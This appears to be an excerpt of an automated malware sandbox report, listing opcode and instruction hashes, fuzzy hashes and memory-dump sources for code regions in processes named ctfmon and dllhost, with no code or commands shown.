                                                            • Opcode ID: d89cfbd8019c450f3ee203dffe0cc8333e39094055f34aff92abd0662d00ec17
                                                            • Instruction ID: d68a6002f846806f2f3ee65359405ea3394fc19234e689488df89b47830791bb
                                                            • Opcode Fuzzy Hash: d89cfbd8019c450f3ee203dffe0cc8333e39094055f34aff92abd0662d00ec17
                                                            • Instruction Fuzzy Hash: 7C312A71B1CB481FE758A76CA8166BA7BD1EF99714F0001BEF44EC31C7CD2869028392
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 201a61f58569e11d93e4a6f2cbaa0256640e83c6a6bb8d7275ab4d90ef39af02
                                                            • Instruction ID: 9aea58abd2e2820cf1328339dfde905ca96e40f682908b34743c48f6b00f7e23
                                                            • Opcode Fuzzy Hash: 201a61f58569e11d93e4a6f2cbaa0256640e83c6a6bb8d7275ab4d90ef39af02
                                                            • Instruction Fuzzy Hash: FB313521B1EA4D4FDB45EB6848751B87BF1EF98200B0A01FBE409D7297CE18AD048752
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6bee9983fdf97fcfb15926df7468aa37fd67e98f66d62012f9ee1c1e65c5eb1
                                                            • Instruction ID: 7331475f2e35e9bd983f2248130c8d69e88b385d43d747596854cfc376a3e8d3
                                                            • Opcode Fuzzy Hash: f6bee9983fdf97fcfb15926df7468aa37fd67e98f66d62012f9ee1c1e65c5eb1
                                                            • Instruction Fuzzy Hash: 8031A631A1961D9FEF55EBB4C46A6E9BBF0FF58300F0505B6D409E3192DE38AA44CB50
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b81b2f95ea95b2ba057bc6e996309f4b98f4962550e66e6be28a266cc76f7da1
                                                            • Instruction ID: afadba0eb8fe55d133773aadb0117f58cbc9a22f62d1e518bb2e1d4d88eb0757
                                                            • Opcode Fuzzy Hash: b81b2f95ea95b2ba057bc6e996309f4b98f4962550e66e6be28a266cc76f7da1
                                                            • Instruction Fuzzy Hash: 4A21F831F1880E5BEB58FBAC98656FD73E1EB98310F1501BBE41DD3285CE29AA414791
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aa631b75b84aa6e61cc66af88fb81b4fc8cb74926e3a5d16d980897c0980d98e
                                                            • Instruction ID: 900d053f8fb737ebe2e168608f01d31fa5e8ac3a89afeae80d7fe0c7b33c4f3d
                                                            • Opcode Fuzzy Hash: aa631b75b84aa6e61cc66af88fb81b4fc8cb74926e3a5d16d980897c0980d98e
                                                            • Instruction Fuzzy Hash: 6A11A512B1ED4F2FE7B4ABA9147A6B537C1EF95A10B0741BAD40DC21A7DD08AE058381
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d563170096535b592c7a694b770b5a14189640f3d7515f23df1da5d96726b91d
                                                            • Instruction ID: 6be61ece9e1790904bb3f0662b328f4ed40682c7dfacb2b945f7eff0d10969a7
                                                            • Opcode Fuzzy Hash: d563170096535b592c7a694b770b5a14189640f3d7515f23df1da5d96726b91d
                                                            • Instruction Fuzzy Hash: 9311593171DB8C1FD786EB6880651A97BE0EFD8250F01057FE04DC31B3ED299A428341
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e79d2e455ca33eae75f01dca18375eab62bf8652ba2b96685813eb4279ecbc28
                                                            • Instruction ID: fa8c8e7a4ffb86a9a27890262199ef22118e3f9d20e5d2e2e5d8c50679e5f1a1
                                                            • Opcode Fuzzy Hash: e79d2e455ca33eae75f01dca18375eab62bf8652ba2b96685813eb4279ecbc28
                                                            • Instruction Fuzzy Hash: BF01FC02F2ED0F1AE2F46B9C146A6F627C5DFD4A50B43017AE40DC219ADC19AE464380
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd1a6d120deafb919ba7414a29d6381c5f475036e135219d4aa0845c6ce58e11
                                                            • Instruction ID: 8a18b2a461f83bfb6e79e08d86f4338337c8e3ad48c20d20df6bab2978f5ccd5
                                                            • Opcode Fuzzy Hash: cd1a6d120deafb919ba7414a29d6381c5f475036e135219d4aa0845c6ce58e11
                                                            • Instruction Fuzzy Hash: 30012B20B0E6C91FD347E378A8A96B47FD1AF87215B0941FAE08CCB0B3CA584946C342
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ae5a6184eaa16db75ec0d1c457dcae73e82321d10cab0093635bc3d66ec8d233
                                                            • Instruction ID: f64871fd6cc1b415c73c6aac1cedc6a509e348daf7bfbe79d0b9920689822f16
                                                            • Opcode Fuzzy Hash: ae5a6184eaa16db75ec0d1c457dcae73e82321d10cab0093635bc3d66ec8d233
                                                            • Instruction Fuzzy Hash: 40F02852F1A80E0FEFA4AAAC14AA3FC77D1EF99212B61007ED10DC32A6DD187E064341
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 451efc8e3651cedea99c7d869705eb8a6856dec91a5f01a3ccc399d86f239375
                                                            • Instruction ID: 5c24c66082669bf52365861fea7a7aaef7e3ed6d836f3665e71c36111a15276b
                                                            • Opcode Fuzzy Hash: 451efc8e3651cedea99c7d869705eb8a6856dec91a5f01a3ccc399d86f239375
                                                            • Instruction Fuzzy Hash: F1014920B1E18A2AE72E23B845303FC27119F81354F0705F9D46DCE2E7CD5D2A928352
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 48856b6d16b49f82d7b8edbb59756a8fc3daa3504152abde32ec2868ca81450c
                                                            • Instruction ID: ca8529a1d5faf6068264fcaaf426868e6e4bfe784ee9bc1ddb2098f50f9b5232
                                                            • Opcode Fuzzy Hash: 48856b6d16b49f82d7b8edbb59756a8fc3daa3504152abde32ec2868ca81450c
                                                            • Instruction Fuzzy Hash: 06F0A435F1940E4BEFA4EA9C98651FD73F1EB98310B1504B9E419E7295CE28EF018B90
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92279c8cf6d92e709cecaa563ee0fb2e86bc31568877d0320b6e9e4a00676ac2
                                                            • Instruction ID: ea07005180645d99716a61e4e546278206cf2cb8a8d3bd5723cfd0cb53fdb54d
                                                            • Opcode Fuzzy Hash: 92279c8cf6d92e709cecaa563ee0fb2e86bc31568877d0320b6e9e4a00676ac2
                                                            • Instruction Fuzzy Hash: A5E02B7290E64C2EEB08AA59FC57CF67F98DA87234B00005FF19DC2163E11275638255
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: deb2473bbcaf883856bd9436d9b24a62e6b8b98c36fbb438aac96a193b4a17eb
                                                            • Instruction ID: dd04580128bc95bab894c96127eb3acb822901af1a8dec0017402f9824ced386
                                                            • Opcode Fuzzy Hash: deb2473bbcaf883856bd9436d9b24a62e6b8b98c36fbb438aac96a193b4a17eb
                                                            • Instruction Fuzzy Hash: C3E0D83196D90C6BDB25AA59FC6168477A1FB8D304F010169E45CC3191D7259755C301
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1786e8dbc94fe636721f19585b7fd1fbc4bd1a06161d5b151394b7ca1547d299
                                                            • Instruction ID: eaeff07692013d08eb41882f2d95426d26a0117b2030e9c6171ae3a87db0f013
                                                            • Opcode Fuzzy Hash: 1786e8dbc94fe636721f19585b7fd1fbc4bd1a06161d5b151394b7ca1547d299
                                                            • Instruction Fuzzy Hash: DCE06F3281AA0C8BEB48AA989C202E837A0FB4D308F0100AAE00CC3290D3326B84C341
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f7e099b685cc7e4bfa54b05848bb3e461683fe6a70ff907951c04528293e27fc
                                                            • Instruction ID: de53a361d5b21827ed11899fea091e247d39208947b06b25ba6b5a93bf25fe4e
                                                            • Opcode Fuzzy Hash: f7e099b685cc7e4bfa54b05848bb3e461683fe6a70ff907951c04528293e27fc
                                                            • Instruction Fuzzy Hash: 48D0925185F7C95ECB1252B61C390847F706E0381078E81EBC4C5CA6A3D48D0A898322
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e17bc4a299026d1b8b24699ac4ad97f5efdbb9a6d40d499536991a14c8ab1bf9
                                                            • Instruction ID: 77eb57825d8557362d696eacd50ebbdcf49590f7d6a6d6e2adf0ab05fc602a8c
                                                            • Opcode Fuzzy Hash: e17bc4a299026d1b8b24699ac4ad97f5efdbb9a6d40d499536991a14c8ab1bf9
                                                            • Instruction Fuzzy Hash: 31C02B13B8AD0F098B047358B880CE1F380C7501303400AB3C80BC104CDC1B98C14340
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d121d8d59690db6f68d8d9961a37dbd912cbdd4bef4c735305bc4055337dc2b
                                                            • Instruction ID: 61c5408ab981c0851da82181cb4543caa9cf800c20c5d5c8208302b0a65d3b9c
                                                            • Opcode Fuzzy Hash: 2d121d8d59690db6f68d8d9961a37dbd912cbdd4bef4c735305bc4055337dc2b
                                                            • Instruction Fuzzy Hash: 32C17C20B1E68E0FE7A99B7884652B57BD1EF66310F0640BED48EC71E7DD5DA842C341
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ee64dc7f3d13b67d80afc222c49cb9b3f7b1a1b91ad49614f34d10d633e02ae4
                                                            • Instruction ID: 9825439bec0f083d81d6ab00e1213296e3eb7bad1fabafff34609e60b2307afe
                                                            • Opcode Fuzzy Hash: ee64dc7f3d13b67d80afc222c49cb9b3f7b1a1b91ad49614f34d10d633e02ae4
                                                            • Instruction Fuzzy Hash: 52324531B0D78E4FE3B5ABA888216B877D1EF41318F0600B9D44D871E7DE6DAD0A8791
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c30e557c5a8b7f7664c23ed53842b4ed24061f225bcd2e5e59a9f713593f4339
                                                            • Instruction ID: bab53f505d33b3c070f66b20de5f0a20b10e636ee535356698c7882031148e89
                                                            • Opcode Fuzzy Hash: c30e557c5a8b7f7664c23ed53842b4ed24061f225bcd2e5e59a9f713593f4339
                                                            • Instruction Fuzzy Hash: 20E13622B0991E5EEB54FBBCE8A5AECBBA0FF44321F1002BBD05DC7197CE2568458750
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8da6933a241b1f4ce51ae4aecbc4b43821c9cd55b2747f6880e7b26bebcfa2b
                                                            • Instruction ID: 94c1a949f8c6b7331e82413a0f056c972c57dbe080e297acdca0454cba4f1b0a
                                                            • Opcode Fuzzy Hash: d8da6933a241b1f4ce51ae4aecbc4b43821c9cd55b2747f6880e7b26bebcfa2b
                                                            • Instruction Fuzzy Hash: 45D11522B0991E5EEB54FBBCE865AECB7A0FF85321F0002BBD05DC7197CE2568458751
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ac98872caa939232fe32e54334aa3d8fb2785c92565a952e5b6dd09cf4b6882
                                                            • Instruction ID: d0df2a99357d857f47850a02fd4040aa327e62f9478d672b1500a701c57c4898
                                                            • Opcode Fuzzy Hash: 9ac98872caa939232fe32e54334aa3d8fb2785c92565a952e5b6dd09cf4b6882
                                                            • Instruction Fuzzy Hash: 9FE1C4A1B1EA1E4FEBF8DB9CC4A567937E1EF95300B52543DD04DC32B2DDA869018B81
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 28866bde30043f297471416eae792f0d3775dc3010d9cb64f4fba59962df210c
                                                            • Instruction ID: 7754d0b6c3752fb16ca292f5800cca5984af3d172be5e7a53a3657603ca23fe0
                                                            • Opcode Fuzzy Hash: 28866bde30043f297471416eae792f0d3775dc3010d9cb64f4fba59962df210c
                                                            • Instruction Fuzzy Hash: 1BB1E322B0991D4EEB94FFA8EC65AEDBBB0FF84311F0002BBD01DD7296CE2568458751
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ab34cc4df0023decc6eb5550d329d6b1b1bdcd8e00800d5b7da55a3956d9536
                                                            • Instruction ID: a0a100bd7d7ccae32a30119f9a5bb3a739ce5d62e8649b03fce068a5284c22d7
                                                            • Opcode Fuzzy Hash: 3ab34cc4df0023decc6eb5550d329d6b1b1bdcd8e00800d5b7da55a3956d9536
                                                            • Instruction Fuzzy Hash: 50B11531B0DA4A4FE7A4EB98C8646B67792EF85314F1540B9D01EC72D7CE29EC46C781
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb6a957614af2f6796d07a2fe5e87a8b736715ef7a31107e634aadf4b9380e33
                                                            • Instruction ID: 992bf3e57ccbbe5e2b5bb424cebf68a2be5b9009d2135694df4cf3f0c99bb512
                                                            • Opcode Fuzzy Hash: eb6a957614af2f6796d07a2fe5e87a8b736715ef7a31107e634aadf4b9380e33
                                                            • Instruction Fuzzy Hash: 5E81D931F1994D4FDBE8EB6884666BCB7E2EF98710F4501BAD04ED32D6CE646C428740
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21b63cbf6d49c95a0f1bd4d7c6b956a8dff518447e2de3f3861874aa370c60a7
                                                            • Instruction ID: 2cc675e7b1ece3e073b0aaaebf58797a6075f0810ffeae300cff9022b8dadb3b
                                                            • Opcode Fuzzy Hash: 21b63cbf6d49c95a0f1bd4d7c6b956a8dff518447e2de3f3861874aa370c60a7
                                                            • Instruction Fuzzy Hash: 2A811D70E0961D8FDB94EFA8C4A5AAD7BF1FF58305F5000B9D00DE7296DA74A941CB40
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3958acaf5a909672313bfc7f3209bdcad1101694f741980ee540de56f079f1ce
                                                            • Instruction ID: bcb264e5cae727f648a3a4723ce392b7ce900fcb298fc1a1cab2e4f82f03cec3
                                                            • Opcode Fuzzy Hash: 3958acaf5a909672313bfc7f3209bdcad1101694f741980ee540de56f079f1ce
                                                            • Instruction Fuzzy Hash: 8241182171D9490FD798FB6884A5EB573E2EFA8300B1641B6E41EC32E7CD29AD428341
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b090dfd71bb829ff87ac0cc50d07e78ee55524013bdb4e82452ce53cafa5216f
                                                            • Instruction ID: 5c68ca2684b9d93ec880240a22bd02ad55e961465d3e0c69b86ad4ef6df28761
                                                            • Opcode Fuzzy Hash: b090dfd71bb829ff87ac0cc50d07e78ee55524013bdb4e82452ce53cafa5216f
                                                            • Instruction Fuzzy Hash: 1F310B21B0DB490FE769A76C98167B97BD1EF99714F0001BEF44EC31C7CD6868028686
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a90e1bafa509e50cc18db1b48ac1ac3b18917fc2817089ba8e3bbb0ad8c1185
                                                            • Instruction ID: 79bf4efd9bfb063089671edd95e237db3f6a4890ebe6c96d51181ceac5bef64e
                                                            • Opcode Fuzzy Hash: 8a90e1bafa509e50cc18db1b48ac1ac3b18917fc2817089ba8e3bbb0ad8c1185
                                                            • Instruction Fuzzy Hash: 4F312721B0EA4D0FDB96EB688C756B87BF1EF99200B0901FBD44DD7297CD18AD048392
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 148e556c1279579187431cdbb3fe163fbc87e460c60868d198522f2286b85588
                                                            • Instruction ID: d2e0e6044895767e2de24369d3babcd093ed024df25c700ffcb84415e701b5f6
                                                            • Opcode Fuzzy Hash: 148e556c1279579187431cdbb3fe163fbc87e460c60868d198522f2286b85588
                                                            • Instruction Fuzzy Hash: 5E31A431A0D51E8FEBA0EBB4C4656EDBBF0FF18300F4555B6D409E31A2DA78A985CB50
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5658145a31d703a92c40a3d3661e879106a5f03e4edcd382e12967e817079b57
                                                            • Instruction ID: e3e4d7e984d0a108e70a9884730f4927110edaa31f26b3524dfad5f30d91c361
                                                            • Opcode Fuzzy Hash: 5658145a31d703a92c40a3d3661e879106a5f03e4edcd382e12967e817079b57
                                                            • Instruction Fuzzy Hash: EF212831F1880E4BEB94FBAC98656FD73E2EF98310F1501BBE41DD3285CD68A9414791
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db2873602223e456c77e205e56374d729ed5f9eebd1e0a3c2351554661a2e761
                                                            • Instruction ID: 0012f9834b33b096f99c4b9b6bd08d97a28c76f568f1992f7a55b47bcb4d85ba
                                                            • Opcode Fuzzy Hash: db2873602223e456c77e205e56374d729ed5f9eebd1e0a3c2351554661a2e761
                                                            • Instruction Fuzzy Hash: CB11D512B0FE4F0FE7F8ABAC14756B636C1DFA5A10B0611BBD44DC21A7DD98AD064388
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 102d4aa2090ef8ac85101b404b72be9c9988f2074fc48b6f95684c932de5dd58
                                                            • Instruction ID: 241c81cee2540b9ba852a952b97c3dabfa462dd009aeafbdc390b405c451f7c2
                                                            • Opcode Fuzzy Hash: 102d4aa2090ef8ac85101b404b72be9c9988f2074fc48b6f95684c932de5dd58
                                                            • Instruction Fuzzy Hash: 8E11563160DB8D0FD7D5EB2884B01A97BE0EFA4360F01457FE04DC72A2DD69AA428341
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f823bfc0bb3ec380752857928e3c33cdee2f726e1a2cbdf1c2946d63794d91b6
                                                            • Instruction ID: f891a833d66b930dc2358aaf14f8095ceae62e0273f8a818135fadbedb0c1470
                                                            • Opcode Fuzzy Hash: f823bfc0bb3ec380752857928e3c33cdee2f726e1a2cbdf1c2946d63794d91b6
                                                            • Instruction Fuzzy Hash: EC01FC12B0FD0F0BE2F87BAC14756B635C5DFE4A50B46117AE80DC219ADC99AD4643C4
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 04b1672ca071e08737edaa50ce620e9e1556db24b7ef8a383f11a21156335c37
                                                            • Instruction ID: 79fc4a5004af6d5b9318b4a6b7d2ca6df58e39f978dedb1d28b2c3a483696e7d
                                                            • Opcode Fuzzy Hash: 04b1672ca071e08737edaa50ce620e9e1556db24b7ef8a383f11a21156335c37
                                                            • Instruction Fuzzy Hash: 4F01C820B0E6C94FD397E37898A96B47F91EF87215B1941F6E09CCB0B7D9984946C342
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3eb35d45dc71aa6db29aafb5f59e168d0fa9da0cc040fb2fbc2b3cd76f1f862
